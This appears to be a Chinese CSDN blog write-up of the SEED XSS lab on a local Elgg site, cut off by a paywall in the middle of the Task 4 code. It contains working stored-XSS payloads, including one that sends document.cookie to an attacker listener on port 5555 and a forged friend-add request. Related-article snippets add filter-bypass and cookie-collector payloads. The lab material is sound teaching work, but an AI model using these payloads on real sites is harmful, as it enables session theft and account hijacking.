Cross-Site Scripting (XSS) Attack Lab网安实验

最新推荐文章于 2024-01-14 11:18:41 发布
最新推荐文章于 2024-01-14 11:18:41 发布
阅读量2.1k 收藏 18
点赞数 2
分类专栏: 网安 文章标签: javascript js web ajax
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l4kjih3gfe2dcba1/article/details/118768821
版权

Cross-Site Scripting (XSS) Attack Lab网安实验

Lab Environment

the Apache server needs to be started.

$ sudo service apache2 start

3.2 Task 1: Posting a Malicious Message to Display an Alert Window

description有<p>标签,不会执行<script>代码内容。可以将恶意代码放入briefdescription中。

在这里插入图片描述

3.3 Task 2: Posting a Malicious Message to Display Cookies

同上,在BD中插入恶意代码

<script>alert(document.cookie);</script>

在这里插入图片描述

3.4 Task 3: Stealing Cookies from the Victim’s Machine

在BD中插入代码,基于CSRF攻击原理,给本机的5555端口发送信息

<script>alert(document.cookie);document.write('<img src=http://127.0.0.1:5555?c=' + document.cookie+'>')</script>

如图,接收到cookie为c=Elgg=f8168b9pg5tpc1u7bhp9i84gk2
在这里插入图片描述

3.5 Task 4: Becoming the Victim’s Friend

<script type="text/javascript">
    window.onload = function () {
    
    var ts="&__elgg_ts="+elgg.security.token.__elgg_ts;
    var token="&__elgg_token="+elgg.security.token.__elgg_token;
 
    var sendurl="/action/friends/add?friend=47" + ts + token + ts + token;
    if (elgg.session.user.guid != 47
最低0.47元/天 解锁文章
(SEED-LabCross-Site Scripting (XSS) Attack Lab跨站脚本攻击实验
lunan的博客
02-02 6172
(SEED-LabCross-Site Scripting (XSS) Attack Lab 跨站脚本攻击实验 欢迎大家访问我的GitHub博客 https://lunan0320.cn 文章目录一、实验目的二、实验步骤与结果2 Lab Environment2.1 The Elgg Web Application2.2 DNS Confifiguration2.3 Apache Confifiguration3 Lab Tasks3.1 Preparation: Getting Familiar w
漏洞挖掘——实验12 Cross-Site Scripting (XSS) Attack Lab
一半西瓜的博客
04-17 3539
题目 Lab Cross-Site Scripting (XSS) Attack Lab Pre 1、名词解释:double free,UAF (Use After Free),RELRO(Relocation Read Only), Dangling pointer,Control Flow Guard 2、阅读下面这三篇文章: UAF学习--原理及利用 https://www.cnb...
XSS Attack Examples (Cross-Site Scripting Attacks)
天元喜羊羊的博客
06-22 2161
http://www.thegeekstuff.com/2012/02/xss-attack-examples/ In the previous article of this series, we explained how to prevent from SQL-Injection attacks. In this article we will see a differ
SeedLab——Cross-Site Scripting (XSS) Attack Lab
Aft3rGl0w的博客
01-14 2610
CSP通过指定允许加载和执行的内容源和资源,限制了浏览器中可以执行的代码。JavaScript可以操作cookie,因此当一个页面存在xss漏洞时,攻击者嵌入的恶意代码就能够完成截获所有访问该页面的cookie,然后将cookie发送给攻击者的服务器的行为,这样攻击者就能使用cookie冒充这些用户的身份了。cookie是存储在客户端的一些键值数据,它用于跟踪和存储有关用户状态、会话和身份验证,因此cookie是浏览器客户端的十分敏感的数据,如果cookie被泄露,就会造成敏感信息的泄露、用户身份的冒用。
【SEED LABCross-Site Scripting (XSS) Attack With SEED Labs - XSS攻击与练习
Jeongon的博客
11-23 1234
seed lab XSS攻击的理解与练习
Cross-Site Scripting (XSS) Attack Lab (Web Application: Elgg)——山东大学络攻防实验
我有一颗五角星
05-22 7581
跨站点脚本(XSS)是通常在Web应用程序中发现的一种计算机全漏洞。此漏洞可使攻击者将恶意代码(例如JavaScript)插入受害者的Web浏览器。使用这种恶意代码,攻击者可以窃取受害者的凭据,如Cookie。可以通过利用XSS漏洞来绕过浏览器用于保护这些凭据的访问控制策略(即,同源策略)。这类漏洞已经被利用来制作强大的络钓鱼攻击和浏览器攻击。 为了展示利用XSS漏洞攻击者可以做什么,我们在预制的Ubuntu VM映像中设置了名为Elgg的Web应用程序。Elgg是社交络非常受欢迎的开源Web应用程序
络攻击技术()——Cross-site scripting
weixin_34306593的博客
01-15 412
1.1.1 摘要       在本系列的第一篇博文中,我向大家介绍了SQL Injection常用的攻击和防范的技术。这个漏洞可以导致一些非常严重的后果,但幸运的是我们可以通过限制用户数据库的权限、使用参数化的SQL语句或使用ORM等技术来防范SQL Injection的发生,接来了要向大家介绍Cross-site scripting(XSS)。       定义:Cross-site scr...
漏洞分析Cross-Site Scripting (XSS) Attack Lab(自用、记录)
weixin_48392428的博客
05-24 1605
Cross-Site Scripting [XSS] Attack Lab1 Overview2 Lab Environment2.1 Starting the Apache Server2.2 The phpBB Web Application2.3 Configuring DNS2.4 Configuring Apache Server2.5 Other software3 Lab Tasks3.1 Task 1: Posting a Malicious Message to Display an Al
信息全 SEED Lab8 Cross-Site Scripting (XSS) Attack Lab
crazyliu的博客
06-12 5379
这个实验主要是利用CSRF攻击来完成一些恶意的操作。由于整个实验过程要用到站,这里先配置一下。 站都部署在本地,且用域名访问,所以我们需要现在 /etc/hosts文件中设置域名到 IP 的映射关系。内容如下: 127.0.0.1 www.xsslabelgg.com 站使用Apache作为服务器,在/etc/apache2/sites-available/000-default.conf配置一下站主目录,内容如下: <VirtualHost *:80> .
Cross-Site Scripting Attack Lab (Elgg)
qq_39249347的博客
07-11 768
实验准备 Ubuntu16.04 将站www.xsslabelgg.com映射到IP地址127.0.0.1,填写在/etc/hosts文件里,同时需要修改Apache服务器配置文件/etc/apache2/sites-available/000-default.conf,以使得Apache服务器可以识别该站点。 在Elgg服务器创建几个用户: |账号|密码| |admin|seedadmin| |alice|seedalice| |boby|seedboby| |charlie|seedcharlie
Cross-site Scripting
05-23
Cross-site Scripting
Cross-Site ScriptingXSS)简介
weixin_30784945的博客
07-13 340
  最近才开始研究HTML以及全问题。如果有什么说得不对的地方,望请指出。   在络应用全中,XSS可能是最常见,范围最大,所包含攻击方法最多,同时也是最难以理解的一种攻击。在OWASP所列出的十大络应用全风险中,其排名第二位,仅次于SQL Injection。   而在本篇文章中,我们将一步一步深入挖掘XSS的攻击流程,攻击手段,以及防御方法等各个方面。 XSS示...
【SEED Labs 2.0】Cross-Site Scripting Attack Lab
Chenyang的博客
08-25 6681
本文为 SEED Labs 2.0 - Cross-Site Scripting Attack Lab实验记录。 实验原理 跨站脚本攻击是指恶意攻击者往 Web 页面里插入恶意 Script 代码,当用户浏览该页之时,嵌入其中 Web 里面的 Script 代码会被执行,从而达到恶意攻击用户的目的。xss 漏洞通常是通过 php 的输出函数将 javascript 代码输出到 html 页面中,通过用户本地浏览器执行的,所以 xss 漏洞关键就是寻找参数未过滤的输出函数。 Task 1: Posting
络攻防技术】XSS攻击手实验——Cross-Site Scripting (XSS) Attack Lab
omniscience的博客
11-13 1710
可以利用www.example60.com,image_www文件夹下的apache_csp.conf文件有这些站的根目录信息,可以把代码保存在www.example60.com,让代码调用这个站的JavaScript代码。self表示只允许从同一域名加载资源,*.example.com表示只允许加载该域名的子域名的资源,unsafe-inline允许内联脚本(一般指script标签的JS代码)、onclick等的执行。此任务的目标是发布一条包含JavaScript的恶意消息,以显示一个警报窗口。
xss介绍
songxiaomianbao的博客
08-24 940
详情介绍: XSS攻击通常指的是通过利用页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到页,使用户加载并执行攻击者恶意制造的页程序。这些恶意页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密页内容、会话和cookie等各种内容...
跨站脚本攻击 xss_跨站脚本攻击(XSS
culi3118的博客
08-11 921
跨站脚本攻击 xssA cross-site scripting attack is one of the top 5 security attacks carried out on a daily basis across the Internet, and your PHP scripts may not be immune. 跨站点脚本攻击是每天在Internet上进行的前五项全攻击之一...
XSS跨站脚本攻击(Cross-site scripting
qq_49841288的博客
07-24 1497
通过页开发时,对用户输入信息过滤不足,将恶意代码注入页中。恶意代码通常是JavaScript,但也包括Java、VBScript、ActiveX、Flash或者普通的HTML。因特的可用资源通过简单字符串来表示,这些字符串被称作URL(统一资源定位器)。DOM是一种与平台、语言无关的应用程序接口(API)它可以动态地访问程序和脚本,更新其内容、结构和www文档的风格(HTMl和XML文档是通过说明部分定义的)。文档可以进一步被处理,处理的结果可以加入到当前的页面。......
cross site scripting attack
Leove的专栏
10-12 635
cross site scripting attack http://www.cert.org/advisories/CA-2000-02.html
跨站脚本攻击(Cross-Site Scripting)问题解决方案
uote_e的博客
09-20 795
跨站脚本攻击(Cross-Site ScriptingXSS)是一种常见的全漏洞,攻击者通过在受信任站上注入恶意脚本,使用户在浏览器中执行这些恶意脚本,从而获取用户的敏感信息或进行其他恶意行为。在开发Web应用程序时,我们应该始终牢记全性,并采取适当的措施来保护用户数据和系统免受跨站脚本攻击的威胁。在将用户输入的数据输出到页上时,必须进行适当的编码和转义,以防止浏览器将其解析为可执行的脚本。例如,如果用户输入的是一个文本字段,可以编写一个函数来过滤掉HTML标签和特殊字符,只保留纯文本信息。
Cross-Site Scripting pikachu
最新发布
03-24
### 关于 Pikachu 项目中的 XSS 漏洞 #### 跨站脚本攻击(XSS) 跨站脚本攻击是一种常见的全漏洞,允许攻击者通过注入恶意脚本来执行未经授权的操作。这种攻击通常发生在 Web 应用程序未能正确验证或转义用户输入的情况下。 在 Pikachu 项目的上下文中,存在多个演示场景来展示 XSS 的工作原理及其潜在危害[^1]。 #### 登录页面的 XSS 风险 受害者可以通过访问 `http://127.0.0.1/pikachu/vul/xss/xsspost/post_login.php` 页面并使用默认凭证 (`test/abc123`) 进行登录操作。此页面可能未对用户的输入进行充分过滤,从而导致反射型或存储型 XSS 攻击的发生。 #### 利用图片标签触发 XSS 另一个典型的例子涉及 `<img>` 标签的滥用。例如,在某些情况下,可以利用如下 HTML 片段发起请求到指定服务器以窃取会话信息或其他敏感数据: ```html <img src="http://127.0.0.1/pikachu/pkxss/xfish/fish.php" /> ``` 上述代码片段展示了如何通过图像加载机制实现远程通信的目的[^2]。 #### 大小写绕过的技巧 为了测试应用程序的全防护措施是否存在缺陷,研究者们经常尝试不同的方法规避检测规则。比如下面这个案例就说明了即使简单的字符转换也可能突破初步防御屏障: ```html <SCRIPT>alert(/xss/)</sCRIpt> ``` 这里故意改变了部分字母的大写形式试图迷惑模式匹配算法达到成功弹窗的效果[^3]。 #### 嵌套 script 标记造成破坏 更进一步地考虑实际应用环境下的复杂情况,则有这样一种构造方式能够有效避开一些基础级别的HTML净化处理逻辑: ```html </script><script> alert('xss')</script> ``` 它巧妙地关闭当前正在解析状态中的 JavaScript 区域然后再开启新的定义区域以便执行自定义命令序列[^4]。 ### 结论 综上所述,Pikachu 提供了一个很好的平台让我们深入理解各种类型的Web全性议题,特别是针对像XSS这样的经典威胁进行了详尽的实际演练.
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

winnower-sliff

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值